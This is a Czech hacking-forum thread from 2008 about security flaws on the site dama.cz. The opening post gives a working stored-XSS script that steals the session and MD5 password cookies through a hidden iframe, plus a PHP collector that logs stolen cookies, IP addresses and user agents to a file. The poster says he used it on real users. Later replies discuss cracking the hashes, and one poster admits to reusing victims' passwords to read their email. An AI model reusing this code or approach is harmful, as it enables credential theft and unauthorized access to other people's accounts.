dama.cz

BugTrack

dama.cz #
Na tenhle web sam narazil omylem! Slo tu xss tak jsem se zkusil registrovat, zjistil jsem ze jde xss uplne vsude a tak jsem badal dal. Dalsi zjisteni bylo ze login ulozi heslo v md5 jako cookies stejne tak i jmeno uzivatele (vetsina uzivatelu predpokladam ze bude mit heslo 6mistne ciselne, nebot takova jsou pridelena), zbastlil jsem tento scriptik:

<script>function get_cookie ( cookie_name ){ var results = document.cookie.match ( '(^|;) ?' + cookie_name + '=([^;]*)(;|$)' ); if ( results )return ( unescape ( results[2] ) ); else return null;} var hackpass = (get_cookie( "id_u" ));var hackuser = (get_cookie( "user" )); var obsah='<iframe style="display:none;" src="[link]"></iframe>'; document.write(obsah);</script>

... a jeste tento php na mem hostingu:

<?php

$cookie = $_GET['cookie'];
$ip = getenv("REMOTE_ADDR");
$ref = getenv("HTTP_REFERER");
$agent = getenv("HTTP_USER_AGENT");
$msg = "\nPage: $ref\nHash: $cookie\nUser: $cookies\nIP Address: $ip\nInfos: $agent";
$soubor = fopen("zaznam.txt", "a+");
fwrite($soubor, "\n".$msg."\n\n");
fclose($soubor);
?>

...mno a to bylo vse, kamkoliv jako komentar bo jako vzkaz odeslete script a do souboru zaznam.txt se zapisuji udaje o navstevnicich spolecne s nickem a hashem hesla v md5...

asi pred peti dny jsem to psal na admina, ale myslim ze to jeste neopravil...

Pass co jsem pri testovani scriptu chytil sem davat nebudu, chytry si to zkusi a nechaji pro sebe, hloupi to nedokazou...

----------
Lide jsou ruzni, nekteri bohuzel i zli...
(odpovědět)
SWDoctor | E-mail2.5.2008 15:51
re: dama.cz #
Hmm, takhle prasacky deravy web jsem jeste nevidel..

To, ze se ti ukladaji do cookies hesla v MD5 je hezke, ale v DB jsou nehashovana.. viz

[link]
(odpovědět)
acetone_bodies3.5.2008 13:37
re: dama.cz #
To je pravda, MySql se teprve ucim, njn... Ale vsechny loginy co prisli on-line cracker mel v databazi, takze no problemo, ale k cemu ucty na tomto webu?!?

----------
Lide jsou ruzni, nekteri bohuzel i zli...
(odpovědět)
SWDoctor | E-mail3.5.2008 19:20
re: dama.cz #
K cemu? :D Je tisice moznosti jak se to da vyuzit/zneuzit.
(odpovědět)
Tomas12345 | 84.21.109.*5.5.2008 16:32
re: dama.cz #
mno, je pravda ze ty co se namahali a zmenili si heslo na jine, tak maji (co jsem jen ze zvedavosti zkousel) vzdy i na mail stejne heslo, ten je uvedeny v nastaveni takze zadna prace, kukal jsem takhle na jeden a tam byli info k uctum na aukro a tak... ale nejsem zly tak jsem neobjednaval :oD

----------
Lide jsou ruzni, nekteri bohuzel i zli...
(odpovědět)
SWDoctor | E-mail5.5.2008 17:23

Zpět
 
 
 

 		BBCode
© 2003–2025 SOOM.cz | ISSN 1804-7270 | info@soom.cz | IRC #soom | changelog | ZGFmMmY1Mm